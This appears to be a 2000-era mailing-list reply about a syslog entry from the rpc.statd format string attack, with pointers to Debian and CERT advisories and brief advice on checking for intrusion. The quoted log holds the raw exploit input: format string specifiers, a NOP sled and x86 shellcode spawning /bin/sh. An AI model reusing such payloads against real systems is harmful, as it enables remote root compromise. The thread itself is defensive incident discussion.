>>>>> "Russell" == Russell Speed <[EMAIL PROTECTED]> writes:
Russell> I am curious if the following is an example of a buffer overflow. I Yes. I have the same in my log. See http://www.debian.org/security/2000/20000719a and http://www.cert.org/advisories/CA-2000-17.html Russell> noticed this in my syslog - and the following day had someone logged in Russell> from an IP I'm not aware of. Russell> I changed the passwords - and added an entry to the input chain to block Russell> the IP, but am wondering what other things I should do? Russell> Should I remove /bin/sh for something less obvious as a general Russell> protection from buffer overflows? That would render unusable lots of shell scripts staring with #!/bin/sh. Russell> As you can see it's a lot of binary and then near the end is "/bin/sh". Russell> Sep 9 21:27:43 gw /sbin/rpc.statd[336]: gethostbyname error for Russell> ^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 Russell> Sep 9 21:27:43 gw Russell> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^A Russell> Í\200è\177ÿÿÿ I'd like someone more knowledgable to comment on this if possible. This log is somewhat different compared to one published by CERT, where you can see a pretty backdoor installed in inetd.conf. In fact after checking my system (not very thoroughly, just quick look on setuids, passwd, shadow, inetd.conf, etc. looking for hidden derectories (e.g. find / -name ".. *") I was unable to find any intrusion and was thinking that the attempt wasn't successful, before I got this mail. Regards, -velco